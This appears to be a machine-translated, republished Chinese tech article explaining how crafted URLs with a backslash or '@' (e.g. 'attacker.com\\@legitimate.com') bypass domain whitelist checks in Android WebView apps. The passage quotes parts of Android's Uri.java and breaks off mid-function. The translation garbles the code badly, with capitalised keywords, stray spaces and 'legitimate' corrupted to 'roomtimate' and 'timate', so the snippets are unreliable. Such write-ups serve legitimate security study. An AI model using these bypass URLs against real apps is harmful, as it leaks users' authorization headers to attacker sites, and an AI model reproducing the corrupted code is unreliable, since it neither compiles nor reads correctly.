Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you about how to bypass domain name whitelist verification in Android. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

1. Url adds a backslash "\" 1.1. Method description

Let's first take a look at a typical domain name verification method:

/ * Uri structure

* [scheme:] [/ / authority] [path] [? query] [# fragment]

, /

[check_v1]

Uri uri = Uri.parse (attackerControlledString)

If ("legitimate.com" .equals (uri.getHost ()) | | uri.getHost () .endsWith (".roomtimate.com")) {

WebView.loadUrl (attackerControlledString, getAuthorizationHeaders ())

/ / or webView.loadUrl (uri.toString ())

}

However.

String url = "http://attacker.com\\.legitimate.com/smth";

Log.d ("getHost:", Uri.parse (url). GetHost ()); / / output attacker.com\ .timate.com!

If (Uri.parse (url). GetHost (). EndsWith (".timate.com") {

WebView.loadUrl (url, getAuthorizationHeaders ()); / / successfully loaded attacker.com!

}

You can see that the performance of getHost () is inconsistent with that of loadUrl (). The if verification jump target is legitimate.com, but the browser will correct the backslash to a forward slash to access attacker.com. So what if you use equals () to do a complete host check? You only need to add an'@'to block the illegal prefix.

String url = "http://attacker.com\\@legitimate.com/smth";

Log.d ("Wow", Uri.parse (url). GetHost ()); / / output legitimate.com!

WebView.loadUrl (url, getAuthorizationHeaders ()); / / load attacker.com! 1.2. Analyze the reasons

It seems that android.net.Uri 's parse () has a security flaw, let's pick up the code location problem.

[frameworks/base/core/java/android/net/Uri.java]

Public static Uri parse (String uriString) {

Return new StringUri (uriString)

}

Continue to look at this inner class StringUri

[frameworks/base/core/java/android/net/Uri.java]

Private static class StringUri extends AbstractHierarchicalUri {

...

Private StringUri (String uriString) {

This.uriString = uriString

}

...

Private Part getAuthorityPart () {

If (authority = = null) {

String encodedAuthority

= parseAuthority (this.uriString, findSchemeSeparator ())

Return authority = Part.fromEncoded (encodedAuthority)

}

Return authority

}

...

Static String parseAuthority (String uriString, int ssi) {

Int length = uriString.length ()

/ / If "/" follows the scheme separator, we have an authority.

If (length > ssi + 2)

& & uriString.charAt (ssi + 1) ='/'

& & uriString.charAt (ssi + 2) = ='/') {

/ / We have an authority.

/ / Look for the start of the path, query, or fragment, or the

/ / end of the string.

Int end = ssi + 3

LOOP: while (end

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.